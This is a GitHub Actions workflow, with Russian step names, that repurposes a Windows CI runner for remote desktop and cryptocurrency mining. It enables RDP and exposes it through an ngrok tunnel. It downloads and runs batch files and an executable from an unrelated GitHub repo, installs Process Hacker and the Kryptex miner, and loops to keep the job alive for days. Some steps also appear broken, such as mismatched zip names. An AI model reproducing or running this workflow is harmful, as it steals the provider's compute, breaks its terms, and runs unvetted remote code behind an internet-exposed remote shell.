name: laucnhssh

on: workflow_dispatch

jobs:
  build:

    runs-on: windows-2016
    timeout-minutes: 9999

    steps:
    - name: Загрузка Ngrok.
      run: |
        Invoke-WebRequest https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-windows-amd64.zip -OutFile ngrok.zip
        Invoke-WebRequest https://raw.githubusercontent.com/shurakiga/RPDtyjsj/main/start.bat -OutFile start.bat
        Invoke-WebRequest https://raw.githubusercontent.com/shurakiga/RPDtyjsj/main/loop.bat -OutFile loop.bat
    - name: Загрузка программ.
      run: |
        Invoke-WebRequest https://raw.githubusercontent.com/shurakiga/RPDtyjsj/main/launcher/FastConfigVPS_v2.3.exe -OutFile "FastConfigVPS_v2.3.exe"
    - name: Загрузка Ngrok файла.
      run: Expand-Archive ngrok.zip
    - name: Подключение к учётной записи Ngrok.
      run: .\ngrok\ngrok.exe authtoken $Env:NGROK_AUTH_TOKEN
      env:
        NGROK_AUTH_TOKEN: ${{ secrets.NGROK_AUTH_TOKEN }}
    - name: Включение доступа RDP.
      run: | 
        Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server'-name "fDenyTSConnections" -Value 0
        Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
        Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -name "UserAuthentication" -Value 1
        copy "FastConfigVPS_v2.3.exe" "C:\Users\Public\Desktop\FastConfigVPS_v2.3.exe"
    - name: Создание туннелей.
      run: Start-Process Powershell -ArgumentList '-Noexit -Command ".\ngrok\ngrok.exe tcp --region eu 3389"'
    - name: Подключение к VDS.
      run: cmd /c start.bat
    - name: Загрузка Process Hacker.
      run: |
        Invoke-WebRequest https://ci.appveyor.com/api/buildjobs/13enx0gti83o5h2r/artifacts/processhacker-3.0.4234-bin.zip -OutFile "ProccesHacker.zip"
    - name: Распаковка Process Hacker.
      run: |
        Expand-Archive ProcessHacker.zip
    - name: Установка Process hacker.
      run: cd ProcessHacker
        cd 64bit
        copy "ProccesHacker.exe" "C:\Users\Public\Desktop\ProccesHacker.exe"
        cd ..
        cd ..
    - name: Загрузка майнера.
      run: |
        Invoke-WebRequest https://d93adf58-7c6e-4915-8502-b53a3c913edb.selcdn.net/installer/4.15.20/kryptex-setup-4.15.20.exe -OutFile "kryptex-setup.exe"
    - name: Установка майнера.
      run: .\kryptex-setup.exe
    - name: Сделано успешно! Вы можете закрыть вкладку.
      run: cmd /c loop.bat

